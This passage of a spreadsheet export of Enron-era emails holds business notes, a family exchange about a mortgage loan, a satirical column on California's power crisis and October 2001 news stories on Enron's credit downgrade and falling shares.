drafting resolutions for adoption by local government officials._x000D_
_x000D_
Jonathan M. Fine_x000D_
Kilpatrick Stockton, LLP_x000D_
3737 Glenwood Ave., Ste. 400_x000D_
Raleigh, NC 27612_x000D_
TEL: (919) 420-1700_x000D_
FAX: (919) 420-1800_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 08:45:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'guillemette.louise@hydro.qc.ca', 'mgrottenthaler@tor.strikeman.com', 'curquhart@millbank.com', 'ejelich@isda.org', 'susan.heard@rbcds.com', 'meg.timberg@opg.com', "'mcgilloway@enron.com", "'bowen@enron.com", 'vangie.mcgilloway@constellation.com', 'ken.bowen@rbcds.com'})</t>
  </si>
  <si>
    <t>ISDA North American Energy and Developing Products Committee_x000D_
 Meeting - November 2 - Canadian Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Hello All -- wanted to let you know that we have scheduled the next NA_x000D_
Energy &amp; Developing Products Committee meeting for Friday, November 2._x000D_
(Meeting details will be circulated to the entire Committee today but  I_x000D_
have attached them for your information)._x000D_
_x000D_
We are in the process of finalizing the agenda, which will largely focus on_x000D_
documentation initiatives to address standardizing netting provisions across_x000D_
energy commodities and to also address physical and financial trading._x000D_
However, I wanted to ask if there are any Canadian energy issues we should_x000D_
include on the agenda.  Would you let me know your thoughts?  Meg gave an_x000D_
update on the Ontario Electricity Market at the July 27 meeting -- is an_x000D_
update in order for the Nov. 2 meeting?  Thank you. -- Stacy_x000D_
_x000D_
_x000D_
 &lt;&lt;Meeting Details - Nov 2.doc&gt;&gt; _x000D_
_x000D_
_x000D_
Stacy Carey_x000D_
Policy Director _x000D_
International Swaps and Derivatives Association_x000D_
600 5th Avenue, 27th Floor_x000D_
Rockefeller Center_x000D_
New York, NY  10020_x000D_
(212) 332-1202 ph_x000D_
(212) 332-1212 fax_x000D_
(917) 543-9622 cell_x000D_
scarey@isda.org_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 08:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Media News</t>
  </si>
  <si>
    <t xml:space="preserve">I have attached the Media News Confirmation for your review. I highlighted _x000D_
one phrase because the fax was hard to read. I also left a blank on Section _x000D_
(iv) (ii) because there was a blank on your fax. Please advise._x000D_
_x000D_
Thanks,_x000D_
jarrod_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Jan 2002 15:03:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'livia_zufferli@monitor.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">what is your number at work?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Livia_Zufferli@Monitor.com@ENRON  _x000D_
Sent:	Monday, January 07, 2002 3:38 PM_x000D_
To:	Zufferli, John_x000D_
Subject:	RE:_x000D_
_x000D_
_x000D_
okay, thanks for responding so quickly_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    John.Zufferli@_x000D_
                    enron.com            To:     Livia_Zufferli@Monitor.com_x000D_
                                         cc:     jzufferli@shaw.ca_x000D_
                    01/07/2002           Subject:     RE:_x000D_
                    04:01 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dad asked if I wanted to lend you some money but I am reluctant to do it at_x000D_
this point in time since:_x000D_
_x000D_
a) I am not completely at liberty to touch all the cash that I have_x000D_
received lately for concern that it may be taken bank under potential_x000D_
creditor action against Enron.  Unfortunatelty, without this cash, I really_x000D_
can't afford to lend any.  The cash that I received recently represents 80%_x000D_
of the cash that I have and I am not sure when I can count on this cash_x000D_
with any degree of certainty.  Therefore, I am reluctant to touch this_x000D_
money for at least 6 months._x000D_
_x000D_
b) As of right now, I don't have a job after Feb. 28.  The new company deal_x000D_
that Enron is trying to structure with its traders and a new buyer will not_x000D_
be_x000D_
done until the month.  If this deal falls through, then I have to find a_x000D_
job with another company.  In this case, it is most likely that I will have_x000D_
to move back to the_x000D_
US since my contacts and the most lucrative opportunities (i.e. compared_x000D_
the the new Enron deal) are there._x000D_
_x000D_
c) If I had the cash to give, Dad asked that I could give you a discount to_x000D_
the bank mortgage.  With discount rates near 5%, even if I gave you a_x000D_
mortgage at_x000D_
4%, I don't think the monthly interest saving for you would be material_x000D_
enough._x000D_
_x000D_
d) I think it is good for you to develop a credit rating with a bank_x000D_
through a mortgage.  It is very beneficial for later on in life.  Paying_x000D_
visa bills does help you a bit in this_x000D_
category, but not like a mortgage._x000D_
_x000D_
_x000D_
Hopefully, you can get the financing from a bank.  I think that this is the_x000D_
best solution in the long run._x000D_
_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   Livia_Zufferli@Monitor.com@ENRON_x000D_
   Sent:   Monday, January 07, 2002 12:54 PM_x000D_
   To:     Zufferli, John_x000D_
   Subject:_x000D_
_x000D_
   Hi John,_x000D_
_x000D_
   Wanted to talk to you about the house stuff.  Dad told me that he was_x000D_
   talking to you about financing options.  I just wanted to say that I_x000D_
   don't_x000D_
   want you to feel compelled to write a mortgage for me -- dad's just_x000D_
   trying_x000D_
   to explore different options.  I know it's a lot of cash, and I would_x000D_
   never_x000D_
   want to impose on you.  I'm sure that I can get a mortgage from the bank_x000D_
   at_x000D_
   a decent rate, as long as I can put down the 25% down payment so that I_x000D_
   can_x000D_
   avoid the mortgage insurance, which is costly.  I'm cashing in some GICs_x000D_
   and other bonds, and Ali's going to lend me $10K, so I will be able to_x000D_
   come_x000D_
   up with the $55K for the down payment._x000D_
_x000D_
   If writing the mortgage is something that you would like to do for a_x000D_
   stable_x000D_
   investment, then we can talk too.  My time horizon on the condo is 5-7_x000D_
   years, so i recognize that that would hold up your capital for a long_x000D_
   while.  Anyway, I have to go ahead and get the guarantee of financing_x000D_
   within 5 days or so, so I have to make a decision in the next day either_x000D_
   way.  Maybe you can call, or email me?_x000D_
_x000D_
   Livia_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
and may contain confidential and privileged material for the sole use of_x000D_
the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
others is strictly prohibited. If you are not the intended recipient (or_x000D_
authorized to receive for the recipient), please contact the sender or_x000D_
reply to Enron Corp. at enron.messaging.administration@enron.com and delete_x000D_
all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_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 13:44:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>AAA Quality Horse Transfer</t>
  </si>
  <si>
    <t>Shipped Tommy from CA for 800.00</t>
  </si>
  <si>
    <t>Sat, 19 Jan 2002 10:31:10 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: NETCo - HR Arrangements for the weekend</t>
  </si>
  <si>
    <t>Ok_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Wed, 13 Jun 2001 06:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California's dim bulbs</t>
  </si>
  <si>
    <t xml:space="preserve">California's dim bulbs_x000D_
P J O Rourke_x000D_
_x000D_
04/01/2001_x000D_
Regulation_x000D_
64_x000D_
Copyright (c) 2001 Bell &amp; Howell Information and Learning Company. All rights _x000D_
reserved. Copyright Cato Institute Spring 2001_x000D_
_x000D_
THE FINAL WORD _x000D_
CALIFORNIA IS IN THE MIDST OF AN ENORmous stupidity crisis. Californians have _x000D_
been sitting in the dark because ... they didn't turn the lights on._x000D_
They say they're short of electricity. Yes, they are. Between 1988 and 1998, _x000D_
California's electricity consumption increased by 15 percent. Meanwhile _x000D_
California's capacity to generate electricity shrank by five percent, even as _x000D_
the state hesitated to build new power lines to tap into neighboring states' _x000D_
power supplies. _x000D_
Californians didn't want dams across their rivers, derricks on their ocean, _x000D_
power lines across their borders, or fossil fuel smoke in their sky. These _x000D_
might interfere with all the smart things Californians do, such as _x000D_
hang-glide. California was going to rely on "negawatts" - dramatic power _x000D_
conservation. (But California regulators put price controls on electricity _x000D_
that lowered prices, and even Californians weren't dumb enough to skip a _x000D_
bargain.) And California was going to rely on alternative power generation. _x000D_
With all the puffery from Silicon Valley dot.com start-ups, wind farms _x000D_
wouldn't be a problem. And doesn't Gwyneth Paltrow's star shine bright enough _x000D_
to operate a solar panel? But it turns out that alternative power generation _x000D_
is an alternative, mostly, to generating power. _x000D_
Californians are people who insist on growing their own vegetables, but they _x000D_
won't dig up the pretty lawn, won't plant anything for fear of getting dirty, _x000D_
and they use fragrant bath salts from The Body Shop instead of smelly _x000D_
compost. Let them make their crudites with crab grass. President Bush was _x000D_
wrong to grant an extension of executive orders requiring out-of-state _x000D_
utilities to supply power to California. And everyone is wrong to listen to _x000D_
Californians whine about electricity deregulation. _x000D_
There never was any deregulation. The California Public Utilities Commission _x000D_
merely changed its regulations, which apparently weren't stupid enough to _x000D_
meet Golden State standards. Under California's 1996 re-regulation plan, _x000D_
electric companies sold their generating plants and became distributors. They _x000D_
were required to buy their power on the wholesale spot market and forbidden _x000D_
to enter into any long-term power supply contracts. Retail electricity prices _x000D_
were lowered by 10 percent and frozen at the new rate until March 2002. _x000D_
This is like requiring A&amp;P to sell you porterhouse at $2 a pound, no matter _x000D_
what the price of beef on the hoof. Imagine how many steaks there would be, _x000D_
and how many supermarkets. Go to one of those boarded-up grocery stores, _x000D_
purchase a phantom T-bone, screw it into a ceiling fixture, and try to light _x000D_
your house. You're in California. _x000D_
Californians devised a system of electricity sales that ignored every _x000D_
dimension of the free market. (Interesting that the "Information Economy" is _x000D_
centered in a place that's immune to information.) The free market is a _x000D_
yardstick, and Californians got smacked with it. Mideast oil jitters, cold _x000D_
weather, natural gas price spikes, and the plain unpredictable freedom of the _x000D_
free market caused wholesale electricity costs to rise and California _x000D_
utilities to go $12 billion into the red. _x000D_
California's governor Gray Davis responded with the full force of bikini _x000D_
beach brain. In a January 8 speech to the state legislature, Davis proposed _x000D_
creating a state agency to buy generating plants and build new ones. He _x000D_
threatened to expropriate power generators and transmission grids. He called _x000D_
for laws to allow criminal prosecution of wholesale suppliers who withheld _x000D_
electricity from California markets. And he said the state's universities and _x000D_
community colleges would build co-generating plants and become energy _x000D_
independent. (With gas produced by the cafeteria food?) Gray Davis sounded _x000D_
like Joseph Stalin with the IQ of Keanu Reeves. "Everyone should understand _x000D_
that there are other, more drastic measures that I am prepared to take if I _x000D_
have to," Davis declaimed. _x000D_
"Take" is the key word. Grabby Californians tried to regulate themselves into _x000D_
some cheap electricity. Hoggish California power companies went along because _x000D_
the stateimposed retail price ceiling was also a retail price floor. _x000D_
According to the Los Angeles Times, during the first 28 months of the scheme, _x000D_
Pacific Gas and Electric and California Edison made $20 billion from the _x000D_
legally required mark-up between wholesale and retail electric prices. _x000D_
Californians want to snatch that money back. "Consumer advocates around _x000D_
California... said it did not matter that the utilities were returning _x000D_
investments to their shareholders," reported the January 31 Washington Post. _x000D_
"They took the money and ran," said state senator John Burton. As opposed to _x000D_
Californians, who took the electricity and roller-bladed? Now the juice and _x000D_
the jack are both gone, and the California legislature has had to pass a bill _x000D_
authorizing $10 billion to try to clean up the mess. _x000D_
But the Californians could still pull a scam. The bill mandates long-term _x000D_
power contracts at rates that are way above what future prices should be. The _x000D_
hope, one guesses, is that Congress, or the President, or somebody will let _x000D_
the state skip out on those contracts once the costs are lower. _x000D_
It would be wrong to call Californians stupid. They're sleazy, too. _x000D_
R J. O'Rourke is the Cato Institute's H. L. Mencken Research Fellow and is _x000D_
foreign affairs desk chief for Rolling Stone. He is author of several _x000D_
bestselling books, including Parliament of Whores, Give War a Chance, Age and _x000D_
Guile, and Eat the Rich._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. </t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 10:48:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.weitekamp@enron.com', 'pamela.daily@enron.com', 'e..campos@enron.com', 'michael.ratner@enron.com', 'mara.gonzalez@enron.com', 'tracy.geaccone@enron.com', 'rod.hayslett@enron.com', 'amy.krone@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
_x000D_
USA: Enron shares in stay in doldrums after downgrade._x000D_
Reuters English News Service, 10/29/01_x000D_
USA: US companies' credit quality to worsen-Moody's._x000D_
Reuters English News Service, 10/29/01_x000D_
_x000D_
Enron's Lenders to Demand Harsher Terms, Analysts Say (Update1)_x000D_
Bloomberg, 10/29/01_x000D_
_x000D_
USA: Enron shares drop despite further triage attempts._x000D_
Reuters English News Service, 10/29/01_x000D_
_x000D_
USA: Enron says in talks with banks for new credit line._x000D_
Reuters English News Service, 10/29/01_x000D_
USA: UPDATE 1-Enron says in talks with banks for new credit line._x000D_
Reuters English News Service, 10/29/01_x000D_
POWER POINTS:Enron May Have To Rethink Asset-Light Focus_x000D_
Dow Jones Energy Service, 10/29/01_x000D_
OFFICIAL CORRECTION Enron long-term ratings downgraded to Baa2 - Moody's_x000D_
AFX News, 10/29/01_x000D_
USA: Moody's cuts Enron to 2 notches above "junk"._x000D_
Reuters English News Service, 10/29/01_x000D_
UK: Europe energy firms wary of Enron on credit worries._x000D_
Reuters English News Service, 10/29/01_x000D_
BANDWIDTH BEAT: Enron Puts Spotlight Back On Broadband_x000D_
Dow Jones Energy Service, 10/29/01_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
USA: Enron shares in stay in doldrums after downgrade._x000D_
_x000D_
10/29/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
NEW YORK, Oct 29 (Reuters) - Enron Corp.'s share price hovered above seven-year lows touched in earlier trade Monday after Moody's Investor Service cut the credit status of its senior unsecured debt of North America's largest energy trader to two ratings above junk status. _x000D_
Enron, the largest electricity and natural gas trader in North America, also on Monday said it was in talks with banks to expand its credit lines to ease financial concerns that have sent its stock slumping more than 50 percent in the past two weeks._x000D_
Enron shares were down $1.40, or 9.03 percent, to $14.10 on the New York Stock Exchange, after earlier in the session trading below $14 for the first time since December 1994. _x000D_
Moody's also warned that it could cut the debt rating again, now downgraded to Baa2, as well as its rating for the Enron's commercial paper. _x000D_
Enron's credit-worthiness will have a direct affect on its day-to-day trading operations and its trading partners' perception of making good on trades. With a credit rating hovering above junk status, the cost of doing business will soar as trading partners look for increased collateral to back trades. _x000D_
Last week Enron shares lost almost $14 billion in market value as a series of piecemeal disclosures about the company's involvement in complex partnerships began to trickle out. _x000D_
Investors have fled Enron's stock in droves following disclosures that the company did off-the-balance sheet transactions with two limited partnerships run by former chief financial officer Andrew Fastow in deals the U.S. Securities and Exchange Commission is now looking into for possible conflict of interest. _x000D_
Enron compensated its partners in this off-balance sheet structure with the promise of Enron shares, if the value of private investments in several of its units fell below a certain level. _x000D_
Many industry observers see Enron's request for additional credit, after the company tapped its banks for $3.3 billion last week, as a sign a weakness. _x000D_
"We are not of the opinion that drawing down all of one's backup bank lines is a demonstration of financial strength, but instead ... it's an act of desperation," said Carol Levenson, an analyst with independent research firm gimmecredit.com._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
USA: US companies' credit quality to worsen-Moody's._x000D_
By Jonathan Stempel_x000D_
_x000D_
10/29/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
NEW YORK, Oct 29 (Reuters) - U.S. corporate credit quality is likely to grow much worse before it gets better, a leading credit rating agency said in a report issued on Monday. _x000D_
Moody's Investors Service said that in the third quarter, it put on review for downgrade its credit ratings for 122 U.S. companies. At the same time, it put on review for upgrade its ratings for just 22 companies._x000D_
That 5.5-to-1 ratio is far greater than the 1.3-to-1 ratio in the second quarter. _x000D_
In dollar terms, the situation looks more dire. Moody's warned it may downgrade $543 billion of debt, dwarfing the $66 billion Moody's said it may upgrade by 8.2-to-1. _x000D_
"Particularly in light of September 11, the fourth quarter will be particularly weak for credit rating changes," said John Puchalla, Moody's senior economist. "A wide excess of rating reviews for downgrade over upgrades in the third quarter suggests credit deterioration will persist at least into early next year." _x000D_
Rating reviews are significant because, unlike actual rating changes, they are not a "lagging" indicator, and suggest the future direction of corporate credit. Moody's normally wraps up its reviews within three months. _x000D_
U.S. corporate credit quality is falling for many reasons. These include the weakening U.S. economy, an inability of marginal companies to raise cash, debt-financed merger activity and fallout from the Sept. 11 attacks on such industries as airlines, insurance, and travel. _x000D_
For example, Moody's in July warned it may cut Comcast Corp.'s ratings after the Philadelphia-based company bid $44.5 billion for AT&amp;T Corp.'s cable TV operations. _x000D_
Then last month, Moody's warned it may cut Chicago-based Boeing Co.'s ratings because of the attacks' potential impact on demand for commercial airplanes. _x000D_
In the third quarter, Moody's warned it may cut its ratings of 54 speculative-grade, or "junk"-rated, companies, and raise the ratings of just 11. For investment-grade companies, the gap was even more yawning: 68-to-11. _x000D_
And in the fourth quarter? Through Friday, Moody's warned it may downgrade 47 companies and raise a mere four. On Monday, it downgraded embattled energy trading giant Enron Corp., and put all of its ratings on review for another downgrade. _x000D_
Puchalla, however, said the decline could slow next year, in part because interest rates are low and companies are managing their balance sheets more conservatively. _x000D_
"Lower borrowing costs and slowing debt growth should reduce debt servicing costs, and fiscal stimulus from the federal government should boost business revenues," he said. "That is a positive for credit quality." _x000D_
The third quarter was the 14th in a row when corporate rating downgrades outpaced upgrades. The record is 19 quarters, set between 1988 and 1993._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
Enron's Lenders to Demand Harsher Terms, Analysts Say (Update1)_x000D_
2001-10-29 12:16 (New York)_x000D_
_x000D_
Enron's Lenders to Demand Harsher Terms, Analysts Say (Update1)_x000D_
_x000D_
     (Updates with analyst comment in fifth paragraph.)_x000D_
_x000D_
     Houston, Oct. 29 (Bloomberg) -- Enron Corp., which can't get_x000D_
low-interest, short-term loans, faces skeptical lenders who will_x000D_
demand increasingly harsher terms as the largest energy trader_x000D_
tries to get cash in the bank, credit analysts said._x000D_
_x000D_
     ``Anyone providing new funding is going to be nervous,'' said_x000D_
Sean Egan, managing director at Egan-Jones Ratings Co. ``It's_x000D_
likely that lenders are going to demand collateral.''_x000D_
_x000D_
     Enron is trying to get $1 billion to $2 billion in loans from_x000D_
Citigroup Inc., J.P. Morgan Chase &amp; Co. and other banks to calm_x000D_
investors after a 52 percent drop in the company's stock since_x000D_
Oct. 17, the Wall Street Journal reported. The company needs cash_x000D_
every day to settle commodities transactions and to keep trading_x000D_
partners._x000D_
_x000D_
     The company on Thursday tapped $3.3 billion in bank credit_x000D_
lines last week to pay off about $2 billion in commercial paper,_x000D_
or short-term corporate loans. A week ago, the Enron said the U.S._x000D_
Securities and Exchange Commission had began an inquiry into_x000D_
related-party transactions. They cost the company $35 million and_x000D_
$1.2 billion in lost shareholder equity._x000D_
_x000D_
     ``Banks are in the driver's seat, and Enron is a little_x000D_
desperate,'' said Peter Petas, a debt analyst at CreditSights Inc._x000D_
``I think their interest rates for loans would go up.''_x000D_
_x000D_
                       Sells Assets for Cash_x000D_
_x000D_
     Companies in Enron's situation often agree to other bank_x000D_
terms in order to secure loans, Petas said. Those can include_x000D_
agreeing to use proceeds from selling assets to pay debt and_x000D_
putting up assets as collateral._x000D_
_x000D_
     Enron is attempting to sell assets to raise cash. Two related_x000D_
partnerships, Osprey and Marlin, depend on selling power plants_x000D_
and similar assets to repay $3.3 billion borrowed to buy the_x000D_
plants. Enron may have to pay any difference between the debt and_x000D_
sales proceeds._x000D_
_x000D_
     The company plans to complete the $2.9 billion sale of_x000D_
Portland General Electric, an Oregon utility, to Northwest Natural_x000D_
Gas Co. next year._x000D_
_x000D_
     Shares of Houston-based Enron fell $1.30, or 8.4 percent, to_x000D_
$14.10 in midday trading. Earlier, they touched $13.55, down 12_x000D_
percent. The company's credit rating was cut by Moody's Investors_x000D_
Service after it wrote down the value of its assets._x000D_
_x000D_
     The stock had tumbled 80 percent in the past 12 months._x000D_
_x000D_
--Russell Hubbard in the Princeton newsroom, 609-750-4651 _x000D_
_x000D_
_x000D_
_x000D_
USA: Enron shares drop despite further triage attempts._x000D_
_x000D_
10/29/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
NEW YORK, Oct 29 (Reuters) - Enron shares slipped to a new six-year low in early trade as North America's largest natural gas and electricity trader said it was talking to banks about tapping additional credit lines to ease financial concerns that have sent its stock slumping more than 50 percent in the past two weeks. _x000D_
Enron's shares were trading down 90 cents, or 5.8 percent, to $14.60 in early morning trade on the New York Stock Exchange. Shares crashed through $15, a low not seen since February 1995._x000D_
Last week, Enron shed almost $14 billion in market value as its stock price tumbled more than half since last week, when a series of piecemeal disclosures about its involvement in complex partnerships began to trickle out. _x000D_
However, many industry observers see Enron's request for an additional credit after tapping its banks for $3.3 billion last week after as a sign a weakness not of strength. _x000D_
"We are not of the opinion that drawing down all of one's backup bank lines is a demonstration of financial strength, but instead ... it's an act of desperation," said Carole Levenson, research analyst with independent research firm gimmecredit.com._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
USA: Enron says in talks with banks for new credit line._x000D_
_x000D_
10/29/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
NEW YORK, Oct 29 (Reuters) - Energy trading giant Enron Corp. said on Monday it is in talks with banks for additional credit, in a move to shore up investor confidence. _x000D_
Enron declined to comment on the size of the credit line, which banks it is in talks with and when it expects to complete an agreement on a new credit line._x000D_
"We want to restore investor and market confidence and nothing instills confidence like cash," said Enron spokesman Mark Palmer. _x000D_
The Wall Street Journal reported Monday the beleaguered energy trader is negotiation with bank for a new credit line of between $1 billion to $2 billion to prop up share prices following last week's selling that sent shares plummeting. _x000D_
Enron said it drew about $3 billion in new credit lines last week, and has a net cash liquid position in excess of $1 billion. _x000D_
Enron shares sank 50 cents, or 3.2 percent, to $15 in early morning trade on the New York Stock Exchange. ((David Howard Sinkman, New York Newsdesk 646-223-6094))._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
_x000D_
USA: UPDATE 1-Enron says in talks with banks for new credit line._x000D_
_x000D_
10/29/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
NEW YORK, Oct 29 (Reuters) - Energy trading giant Enron Corp. said on Monday it is in talks with banks for additional credit, in a new move to shore up investor confidence after it tapped about $3 billion in credit last week, and to stop a plunge in the company's stock that set new six-year lows. _x000D_
Enron declined to comment on the size of the credit line, which banks it is in talks with and when it expects to complete an agreement on the new credit line._x000D_
Enron shares crashed through a psychological barrier of $15 a share, shedding $1.66, or 10.65 percent, to $13.85 in early morning trade on the New York Stock Exchange. The stock has lost more than half of its value in the past two weeks, losing more than $14 billion in market capitalization. _x000D_
"We want to restore investor and market confidence and nothing instills confidence like cash," said Enron spokesman Mark Palmer in Houston. _x000D_
Enron shares have tumbled since the company reported its first-quarterly loss in more than four years on Oct. 16. The company also wrote down $1.2 billion in equity, including transactions with partnerships formerly run by its chief financial officer who was forced to step down from Enron last week. _x000D_
The sell-off was sparked by investor concern about the transparency of the transactions, which the Securities and Exchange Commission is examining. Enron last week replaced CFO Andrew Fastow as part of efforts to restore investor confidence. _x000D_
The Wall Street Journal reported Monday the beleaguered energy trader is negotiation with bank for a new credit line of between $1 billion to $2 billion to prop up share prices following last week's selling that sent shares plummeting. _x000D_
Enron said it drew about $3 billion in new credit lines last week, and has a net cash liquid position in excess of $1 billion. _x000D_
"Clearly, both the stock and bond market view Enron as being in dire straits," said independent research firm Gimme Credit analyst Carol Levenson. _x000D_
"We are not of the opinion that drawing down all of one's backup bank lines is a demonstration of financial strength, but instead it's an act of desperation."_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
POWER POINTS:Enron May Have To Rethink Asset-Light Focus_x000D_
By Mark Golden_x000D_
_x000D_
10/29/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
A Dow Jones Newswires Column _x000D_
_x000D_
NEW YORK -(Dow Jones)- On the face of things, it's hard to understand the stock market's headspinning reaction to Enron Corp.'s (ENE) revelation of some bad news in recent weeks._x000D_
Why the talk of a "death spiral" for North America's premier energy trading company? The stock price of Cisco Systems Inc. (CSCO), for example, saw an almost identical drop over a similar 12-month period. Nobody questioned the viability of Cisco. _x000D_
The difference is that over the past few years, Enron has redefined itself as a company that runs on financial and intellectual muscle - not hard assets - and that focus is getting the company into trouble now that its credibility is in question. _x000D_
If you're buying network components, you can probably stand some ambiguity in the finances of your supplier. After all, you're buying something you can touch. But if you're buying power or gas, what you're really buying is a commitment to deliver. If your supplier doesn't come through when the market gets tough, you're left totally exposed. In Enron's energy trading business, then, credibility at every level is critical. _x000D_
For now, Enron looks to be more than viable. But the company's asset-light strategy might not be. Gross profits from trading have shrunk to 1.65% in the third quarter from 5.26% in the first quarter of 1998. Meanwhile, asset-heavy energy companies like Mirant Corp. (MIR) and Calpine Corp. (CPN) successfully use trading to optimize the performance of power plants and other infrastructure. _x000D_
Two weeks ago, Enron reported a $618 million third-quarter loss, resulting from $1.01 billion in write-offs. That didn't send investors running, however. In fact, its stock price rose a bit on the news. _x000D_
What hurt was the disclosure that Enron had reduced its net assets, or "shareholders' equity," by $1.2 billion as a consequence of unwinding positions in partnerships headed by former Chief Financial Officer Andrew Fastow. That, along with warnings of possible downgrades by credit ratings agencies and an inquiry by the Securities &amp; Exchange Commission produced a $15.6 billion drop in Enron's market value. _x000D_
On Monday, Moody's Investors Service followed through by downgrading its rating on Enron's senior, unsecured long-term debt to Baa2 from Baa1, leaving it two steps above junk-bond levels. The agency kept Enron's ratings on watch for further downgrade. _x000D_
Long-Running Concerns _x000D_
_x000D_
A 50% hit to shareholder value still seems like an overreaction to a 10% reduction in shareholders' equity. The stock price reflects the expectation of additional losses to be reported and Enron's loss of credibility. Enron executives in a conference call Tuesday insisted that the worst was behind them, but few on the call believed that. _x000D_
For some analysts, Enron's revelations only fed long-running concerns about the company's lack of financial disclosure. _x000D_
Cary Wasden, managing partner of Reed Wasden Research, has had a "sell" recommendation on Enron since March. Unlike the analysts at big Wall Street firms, Wasden isn't in the business of selling stock. His firm isn't involved in brokerage and isn't a hedge fund. Wasden gets paid for his research, and the company doesn't invest in the securities it covers. _x000D_
A main Wasden concern with Enron is that the company has regularly included the proceeds from one-time sale of physical assets in operating income. His belief is that Enron has dramatically inflated its earnings for the past couple of years - a concern to which an Enron spokeswoman couldn't immediately respond. _x000D_
"Don't believe by any means this is the end of the story," Wasden said. _x000D_
Wall Street sell-side analysts have largely kept Enron as a "buy" or "strong buy" as the stock fell from $90 to $20. But even they are expressing concerns about the quality of Enron's reporting. _x000D_
For now, the plunge in the price of Enron's shares and bonds, which last week started trading like junk-rated debt, hasn't hurt its credit standing with energy trading partners. _x000D_
"We haven't changed our thinking regarding Enron or our policies and practices. We're watching it, and so is everybody else, but they are a solid company," Reliant Energy Inc. (REI) spokesman Richard Wheatley said in a typical reaction. "This is unfortunately a feeding frenzy regarding some dealings that I'm sure Enron will be able to come out of at some point." _x000D_
Keeping Talent A Challenge _x000D_
_x000D_
Enron is a big company - far too big to ignore. But continued deterioration in the price of its shares and bonds could lead counterparties to restrict their traders' transactions with Enron. If the company's investment-grade bonds continue to trade near levels traditionally considered distressed, risk managers won't be able to ignore it, whatever else Moody's does. _x000D_
Assuming that doesn't happen, Enron still faces a tough road ahead. Like all companies, Enron is the combination of capital and talent. For financial companies, talent is the more important ingredient, and Enron has been suffering damage to its talent for some time. _x000D_
New Chief Executive Jeff Skilling left in August, and a handful of his key lieutenants left earlier in the year. The losses can be expected to continue. Much of the top management cashed out when the company's stock price was high and moved on. Now middle management on down is angry and anxious to move on, if they haven't already. _x000D_
Over the years, Enron has compensated its very talented labor with stock options to make up for base pay considered low by the industry. Those options are now nearly worthless. If Enron's debt-service costs rise, the company could struggle to attract the talent needed to generate income in its core business of trading energy in North America. _x000D_
Some analysts would like to see more turnover at the very top. When Skilling left, nobody believed Skilling or Chairman Kenneth Lay's assurances that it was for "personal reasons." When CFO Fastow was forced out of his position last week, Lay said, "In my continued discussions with the financial community, it became clear to me that restoring investor confidence would require us to replace Andy as CFO." _x000D_
That's putting words in Wall Street analysts' mouths. Who thought scapegoating Fastow was really the answer? _x000D_
"I don't know anybody who said that," Wasden said. "What did the CFO do, what did Skilling do, that Ken Lay wasn't part of?" _x000D_
Real change will have to come from without, Wasden said. _x000D_
"Enron has been a cult, more than a company," he said. "Recruiting from within does nothing to change the company, it just changes the disciples. Enron needs to pull some top talent from outside." _x000D_
Nevertheless, Wasden thinks Enron's stock has reached its natural floor and, if the company starts disclosing how it really makes money, it can recover over time. _x000D_
"There are a lot of earnings that can be wrung out of really strong operating assets, like pipelines and power plants," he said. _x000D_
That means paying more attention to the assets that Enron has spent the past few years denigrating. Given the bind Enron is in, Lay won't have much choice. Enron will survive, but it won't be the same company at all. _x000D_
-By Mark Golden, Dow Jones Newswires; 201-938-4604; mark.golden@dowjones.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
OFFICIAL CORRECTION Enron long-term ratings downgraded to Baa2 - Moody's_x000D_
_x000D_
10/29/2001_x000D_
AFX News_x000D_
(c) 2001 by AFP-Extel News Ltd_x000D_
_x000D_
(Moody's corrected its stance on Enron ratings to a downgrade) _x000D_
